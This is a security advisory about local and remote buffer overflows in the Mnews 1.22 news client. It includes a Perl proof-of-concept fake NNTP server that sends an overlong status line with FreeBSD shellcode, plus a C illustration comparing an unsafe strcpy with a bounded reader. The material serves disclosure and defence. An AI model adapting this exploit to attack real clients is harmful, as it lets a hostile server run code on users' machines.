COMMAND

    Mnews local and remote overflow vulnerabilities

SYSTEMS AFFECTED

    Mnews version 1.22, possibly older versions too

PROBLEM

    zillion [http://www.snosoft.com] found the following, as reported in
    Strategic Reconnaissance Team Security Advisory (SRT2002-04-31-1159):

    Mnews is a small console-based email and news client which is often
    installed setgid mail. Several local and remote overflows have been
    identified in this package.

    Local overflows were found in the -f, -n, -D, -M and -P command-line
    parameters and in the JNAMES and MAILSERVER environment variables.

    The remote overflow resides in the code responsible for processing
    responses received from the NNTP server: the status line sent by the
    server is copied into a fixed-size buffer without a length check. For
    example, a response consisting of "200 " followed by 770 filler bytes
    (written as "200 <a x 770>" in the advisory) results in an overflow.

    If you look at the source code of mnews you will see that this package
    is very outdated and dangerous to use on today's Internet.

    Impact
    ======

    Local users might be able to elevate their privileges on the affected
    systems (to the mail group where the binary is installed setgid mail).

    The operator of a malicious NNTP server can use mnews to penetrate an
    affected system: any user who connects to that server with mnews runs
    the server's code with their own privileges.

    Proof of Concept
    ================

    The exploit below, taken from the advisory, is a fake NNTP server. It
    waits for mnews to connect on port 119 and answers with a 762-byte
    status line whose tail is a FreeBSD/i386 shellcode and a repeated
    return address pointing back into the buffer. The shellcode only
    write()s the string "Wasssssuppppp !! ???" to stdout and exits.

#!/usr/bin/perl -w
#
# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped
# with the 4.5-RELEASE ports collection.
#
# This exploit is pretty harmless as it only prints a small message to
# stdout (NAI?).
#
# Written by zillion[at]safemode.org (!shit)
#
# http://www.safemode.org
# http://www.snosoft.com

use strict;
use IO::Socket;

# FreeBSD/i386 shellcode: write(1, "\nWasssssuppppp !! ???\n", 21); exit(0)
my $shellcode =
    "\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88".
    "\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50".
    "\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73".
    "\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f".
    "\x23";

# normal \x90 nops don't work here..
my $nop  = "A";
my $esp  = 0xbfbff65e;   # stack address observed on the target
my $off  = -70;          # offset from $esp to the filler/shellcode
my $size = 762;          # bytes of filler + shellcode before the saved EIP

# Filler, then the shellcode, then the new return address twice.
my $buffer = "";
for (my $i = 0; $i < ($size - length($shellcode)); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $off));
$buffer .= pack('l', ($esp + $off));

printf("Starting to listen for incoming connections... buffer size %d\n",
       length($buffer));
print("The new return address: 0x", sprintf('%lx', ($esp + $off)), "\n");

# Listen on the NNTP port; mnews must be pointed at this host.
my $sock = IO::Socket::INET->new(
    LocalPort => 119,
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
) or die "listen on port 119 failed: $!\n";

while (my $cl = $sock->accept()) {
    sleep 1;
    # The overlong "200 ..." greeting is what overflows the client's buffer.
    print $cl "200 $buffer\n";
    sleep 3;
}

SOLUTION

    Stop using Mnews. Where it cannot be removed immediately, dropping the
    setgid bit removes the local privilege-elevation path, but the remote
    overflow still runs a hostile server's code with the privileges of
    whichever user connects to it.
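The bug class behind the remote overflow, as an added illustration written for this page (it is not mnews's source and not part of the advisory): an NNTP status line copied into a fixed stack buffer with an unbounded strcpy(), beside a bounded reader that caps what it stores, drains the rest of an overlong line so the leftover bytes are not mistaken for the next response, and only accepts a three-digit status code. The buffer size RESP_MAX, the function names, the in-memory stream standing in for the socket and the sample responses are all assumptions; the hostile line is built the way the advisory describes it ("200 " plus 770 filler bytes).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define RESP_MAX 256   /* assumed size of the client's fixed response buffer */

/* Vulnerable pattern (the class of bug the advisory describes, not mnews's
 * code): the server's status line is copied into a fixed-size stack buffer
 * with no length check. A line of RESP_MAX bytes or more, such as "200 "
 * followed by 770 filler bytes, runs past buf[] and over the saved return
 * address. Only ever called with short input in this file. */
int nntp_status_unsafe(const char *line)
{
    char buf[RESP_MAX];
    strcpy(buf, line);            /* no bound: this is the overflow */
    return atoi(buf);
}

/* Minimal in-memory stand-in for the socket the client reads from. */
typedef struct {
    const char *data;
    size_t len;
    size_t pos;
} nntp_stream;

static int stream_getc(nntp_stream *s)
{
    return s->pos < s->len ? (unsigned char)s->data[s->pos++] : -1;
}

/* Bounded replacement. Reads one LF-terminated line, keeps at most
 * buflen-1 bytes and drains the remainder of an overlong line so the
 * leftover bytes are not parsed as the next server response. Accepts only
 * "NNN" or "NNN <text>" and returns the numeric code; returns -1 on EOF,
 * on an overlong line (treated as hostile) or on a malformed status. */
int nntp_status_bounded(nntp_stream *s, char *buf, size_t buflen, int *truncated)
{
    size_t n = 0;
    int c;

    *truncated = 0;
    if (buflen == 0)
        return -1;
    while ((c = stream_getc(s)) != -1 && c != '\n') {
        if (n < buflen - 1)
            buf[n++] = (char)c;
        else
            *truncated = 1;       /* discard, never store */
    }
    if (c == -1 && n == 0)
        return -1;                /* EOF without a line */
    if (n > 0 && buf[n - 1] == '\r')
        n--;
    buf[n] = '\0';
    if (*truncated)
        return -1;
    if (n < 3 || !isdigit((unsigned char)buf[0]) ||
        !isdigit((unsigned char)buf[1]) || !isdigit((unsigned char)buf[2]))
        return -1;
    if (n > 3 && buf[3] != ' ')
        return -1;
    return (buf[0] - '0') * 100 + (buf[1] - '0') * 10 + (buf[2] - '0');
}

/* Builds the advisory's trigger, "200 " plus n filler bytes, CRLF-terminated.
 * Constructed test data; the caller frees it. */
char *make_overlong_status(size_t n)
{
    char *line = malloc(4 + n + 3);
    if (!line)
        return NULL;
    memcpy(line, "200 ", 4);
    memset(line + 4, 'a', n);
    memcpy(line + 4 + n, "\r\n", 3);   /* copies the NUL as well */
    return line;
}

/* Feeds the hostile line followed by a benign "205 closing" through the
 * bounded reader. Returns 1 if the overlong line was rejected and the
 * following response was still parsed correctly, else 0. */
int demo_hostile_server(void)
{
    char *evil = make_overlong_status(770);
    if (!evil)
        return 0;
    size_t elen = strlen(evil);
    const char *tail = "205 closing\r\n";
    size_t total = elen + strlen(tail);
    char *feed = malloc(total + 1);
    if (!feed) { free(evil); return 0; }
    memcpy(feed, evil, elen);
    strcpy(feed + elen, tail);

    nntp_stream s = { feed, total, 0 };
    char buf[RESP_MAX];
    int trunc1, trunc2;
    int first  = nntp_status_bounded(&s, buf, sizeof buf, &trunc1);
    int second = nntp_status_bounded(&s, buf, sizeof buf, &trunc2);
    free(evil);
    free(feed);
    return first == -1 && trunc1 == 1 && second == 205 && trunc2 == 0;
}

int main(void)
{
    printf("benign greeting via unsafe parser: %d\n",
           nntp_status_unsafe("200 news.example.org ready"));
    printf("hostile server handled safely: %s\n",
           demo_hostile_server() ? "yes" : "no");
    return 0;
}
```

Rejecting the overlong line outright, rather than silently truncating it, is deliberate: a server that sends a status line longer than any legitimate NNTP greeting is not worth talking to, and treating it as a protocol error avoids acting on whatever prefix happened to fit in the buffer.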